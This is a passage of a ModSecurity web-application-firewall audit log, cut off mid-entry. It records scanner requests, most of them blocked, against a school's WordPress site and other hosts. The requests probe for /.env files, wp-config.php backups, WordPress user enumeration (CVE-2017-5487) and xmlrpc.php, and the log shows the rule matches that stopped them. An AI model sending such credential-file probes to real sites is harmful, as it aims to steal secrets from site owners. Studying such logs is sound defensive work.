[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744996797042802 754 (- - -) Stopwatch2: 1744996797042802 754; combined=323, p1=286, p2=0, p3=0, p4=0, p5=37, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a50db75-Z-- --9f879309-A-- [19/Apr/2025:01:44:40 +0700] aAKdmFyj-eUTITfvHEXwFAAAAAo 103.236.140.4 37070 103.236.140.4 8181 --9f879309-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 157.245.113.227 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 157.245.113.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9f879309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f879309-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745001880755317 838 (- - -) Stopwatch2: 1745001880755317 838; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f879309-Z-- --c17e840a-A-- [19/Apr/2025:01:45:56 +0700] aAKd5DlhhbF_BYhFYTWlvQAAAEk 103.236.140.4 37370 103.236.140.4 8181 --c17e840a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.86.112.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.86.112.29 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c17e840a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c17e840a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745001956620746 3135 (- - -) Stopwatch2: 1745001956620746 3135; combined=1356, p1=461, p2=855, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c17e840a-Z-- --0035893a-A-- [19/Apr/2025:01:54:10 +0700] aAKf0hk6uTiIdxrJEERxUwAAANQ 103.236.140.4 39324 103.236.140.4 8181 --0035893a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.118.228 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.118.228 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --0035893a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0035893a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745002450147221 888 (- - -) Stopwatch2: 1745002450147221 888; combined=389, p1=330, p2=0, p3=0, p4=0, p5=58, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0035893a-Z-- --9d220555-A-- [19/Apr/2025:02:20:10 +0700] aAKl6jlhhbF_BYhFYTWnMAAAAEI 103.236.140.4 45198 103.236.140.4 8181 --9d220555-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9d220555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d220555-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745004010426668 797 (- - -) Stopwatch2: 1745004010426668 797; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d220555-Z-- --68e3fa6d-A-- [19/Apr/2025:02:20:37 +0700] aAKmBVyj-eUTITfvHEXy0QAAABg 103.236.140.4 45304 103.236.140.4 8181 --68e3fa6d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --68e3fa6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e3fa6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745004037230007 725 (- - -) Stopwatch2: 1745004037230007 725; combined=292, p1=260, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e3fa6d-Z-- --5603a760-A-- [19/Apr/2025:03:35:04 +0700] aAK3eA6cTFSgLAHl7PpLmwAAABY 103.236.140.4 34028 103.236.140.4 8181 --5603a760-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5603a760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5603a760-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745008504452628 3592 (- - -) Stopwatch2: 1745008504452628 3592; combined=1533, p1=472, p2=1029, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5603a760-Z-- --3ad2de73-A-- [19/Apr/2025:03:35:06 +0700] aAK3euvDiFC_ir7MDwZxygAAAEc 103.236.140.4 34040 103.236.140.4 8181 --3ad2de73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ad2de73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ad2de73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745008506667902 2745 (- - -) Stopwatch2: 1745008506667902 2745; combined=1190, p1=418, p2=743, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ad2de73-Z-- --79e8d706-A-- [19/Apr/2025:03:35:08 +0700] aAK3fHNa4dA2HllpK_MEbwAAAI8 103.236.140.4 34052 103.236.140.4 8181 --79e8d706-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79e8d706-C-- demo.sayHello --79e8d706-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79e8d706-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745008508883090 5297 (- - -) Stopwatch2: 1745008508883090 5297; combined=3972, p1=558, p2=3187, p3=22, p4=24, p5=103, sr=113, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79e8d706-Z-- --05183e58-A-- [19/Apr/2025:03:35:23 +0700] aAK3iw6cTFSgLAHl7PpLogAAAAs 103.236.140.4 34112 103.236.140.4 8181 --05183e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --05183e58-C-- demo.sayHello --05183e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --05183e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745008523416916 7233 (- - -) Stopwatch2: 1745008523416916 7233; combined=5151, p1=644, p2=4222, p3=39, p4=45, p5=116, sr=104, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05183e58-Z-- --b138ab1a-A-- [19/Apr/2025:03:36:24 +0700] aAK3yOvDiFC_ir7MDwZx4AAAAEI 103.236.140.4 34344 103.236.140.4 8181 --b138ab1a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.203.68.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.203.68.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b138ab1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b138ab1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745008584268601 793 (- - -) Stopwatch2: 1745008584268601 793; combined=329, p1=290, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b138ab1a-Z-- --40da686e-A-- [19/Apr/2025:03:48:17 +0700] aAK6kXNa4dA2HllpK_MFAAAAAJg 103.236.140.4 37042 103.236.140.4 8181 --40da686e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --40da686e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40da686e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745009297570585 807 (- - -) Stopwatch2: 1745009297570585 807; combined=358, p1=321, p2=0, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40da686e-Z-- --9c011c6d-A-- [19/Apr/2025:03:57:57 +0700] aAK81evDiFC_ir7MDwZzPgAAAFQ 103.236.140.4 39270 103.236.140.4 8181 --9c011c6d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9c011c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c011c6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745009877991666 736 (- - -) Stopwatch2: 1745009877991666 736; combined=302, p1=262, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c011c6d-Z-- --4567ba71-A-- [19/Apr/2025:04:51:44 +0700] aALJcA6cTFSgLAHl7PpRzwAAABU 103.236.140.4 56150 103.236.140.4 8181 --4567ba71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.118.228 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.118.228 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4567ba71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4567ba71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745013104446393 785 (- - -) Stopwatch2: 1745013104446393 785; combined=330, p1=292, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4567ba71-Z-- --10a3e15e-A-- [19/Apr/2025:05:37:31 +0700] aALUK-vDiFC_ir7MDwZ7JAAAAEM 103.236.140.4 41658 103.236.140.4 8181 --10a3e15e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.106.215 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.106.215 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --10a3e15e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10a3e15e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745015851816529 797 (- - -) Stopwatch2: 1745015851816529 797; combined=336, p1=296, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10a3e15e-Z-- --6abcc05c-A-- [19/Apr/2025:05:37:32 +0700] aALULEruoUXZj665VUF2tAAAAMg 103.236.140.4 41666 103.236.140.4 8181 --6abcc05c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.106.215 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.106.215 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --6abcc05c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6abcc05c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745015852475148 782 (- - -) Stopwatch2: 1745015852475148 782; combined=345, p1=310, p2=0, p3=0, p4=0, p5=34, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6abcc05c-Z-- --40a72670-A-- [19/Apr/2025:07:38:30 +0700] aALwhkruoUXZj665VUF9CAAAAMI 103.236.140.4 41298 103.236.140.4 8181 --40a72670-B-- GET /wp-config.php.web HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.70 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --40a72670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40a72670-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023110790605 898 (- - -) Stopwatch2: 1745023110790605 898; combined=359, p1=322, p2=0, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40a72670-Z-- --db74bf33-A-- [19/Apr/2025:07:38:31 +0700] aALwh-vDiFC_ir7MDwaEhgAAAFY 103.236.140.4 41304 103.236.140.4 8181 --db74bf33-B-- GET /wp-config.php.sw HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.70 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --db74bf33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db74bf33-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023111672932 2522 (- - -) Stopwatch2: 1745023111672932 2522; combined=644, p1=580, p2=0, p3=0, p4=0, p5=64, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db74bf33-Z-- --3dd3bd76-A-- [19/Apr/2025:07:38:32 +0700] aALwiA6cTFSgLAHl7PpbfwAAAA4 103.236.140.4 41310 103.236.140.4 8181 --3dd3bd76-B-- GET /wp-config.php.old.bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --3dd3bd76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dd3bd76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023112565465 913 (- - -) Stopwatch2: 1745023112565465 913; combined=343, p1=301, p2=0, p3=0, p4=0, p5=41, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dd3bd76-Z-- --76f14b25-A-- [19/Apr/2025:07:38:33 +0700] aALwievDiFC_ir7MDwaEiAAAAEI 103.236.140.4 41316 103.236.140.4 8181 --76f14b25-B-- GET /wp-config.php.. 
